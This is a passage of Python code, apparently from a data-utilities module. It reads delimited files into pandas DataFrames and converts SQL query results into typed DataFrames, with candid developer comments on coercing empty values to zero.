if 'datetime' in dtypes[k]:
dtypes[k] = 'object'
parse_dates.append(k)
try:
df = pd.read_csv(buf, header=None, names=column_names, dtype=dtypes, sep=sep, na_values=na_values, keep_default_na=False, parse_dates=parse_dates, encoding='utf-8')
except ValueError:
#remove dtypes if we have converters instead:
for k in six.iterkeys(converters):
if k in list(dtypes.keys()):
dtypes.pop(k, None)
na_values.append('')
buf = open(infile, 'rb')
headerIO = six.BytesIO(buf.readline()) # The first line needs to be in a separate iterator, so that we don't mix read and iter.
header = next(csv.reader(headerIO, delimiter=sep)) # Just parse that first line as a csv row
df = pd.read_csv(buf, header=None, names=column_names, dtype=dtypes, sep=sep, na_values=na_values, keep_default_na=False, parse_dates=parse_dates, converters=converters, encoding='utf-8')
finally:
# A final note:
# SURELY there's a more efficient and native pandas way of doing this, but I'll be damnded if I could figure it out.
# Pandas used to have an error='coerce' method to force data type. It's no longer an option, it seems.
# Forcing data type is NOT easy, when incoming text data is sequential delimiters with no values or whitespace.
# What We're doing now is still not w/o risk. There are use cases for setting empty to zero, which is what we're doing, and use cases to set
# empty to null, which is probably what we SHOULD do, but for now, we do it this way because we already have a battle hardened dh.cast_as_float that
# works this way. We should probably just call a different homegrown float that returns a NaN or None (None being preferred) rather than 0.0 on exception.
# Mercy. This has been a pain.
# I guess if it was easy, Pandas wouldn't support the ability to send in your own converters.
pass
return df
finally:
if isinstance(infile, six.string_types):
buf.close()
#Otherwise leave it open, since this function didn't open it.
def table_result_to_df(result):
"""Converts a SQL result to a pandas dataframe
Args:
result (dict): The result of a database query
Returns:
`pandas.DataFrame`: A dataframe representation of `result`
"""
meta = result['meta']
data = result['data']
columns = [m['id'] for m in meta]
dtypes = {
m['id']: dtype_from_sql(m['dtype'].lower())
for m in meta
}
df = pd.DataFrame.from_records(data, columns=columns)
try:
typed_df = df.astype(dtype=dtypes)
except:
"""
This is heavy-handed, but it had to be.
Something was tripping up the standard behavior, presumably relating to
handling of nulls in floats. We're forcing them to 0.0 for now, which is possibly
sketchy, depending on the use case, but usually preferred behavior.
Buyer beware.
"""
typed_df = df
for col in typed_df.columns:
if dtypes[col] == u'object':
typed_df[col] = list(map(dh.cast_as_str, typed_df[col]))
elif dtypes[col].startswith(u'float'):
typed_df[col] = list(map(dh.cast_as_float, typed_df[col]))
elif dtypes[col].startswith(u'int'): #detect any flavor of int and cast it as int.
typed_df[col] = list(map(dh.cast_as_int, |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.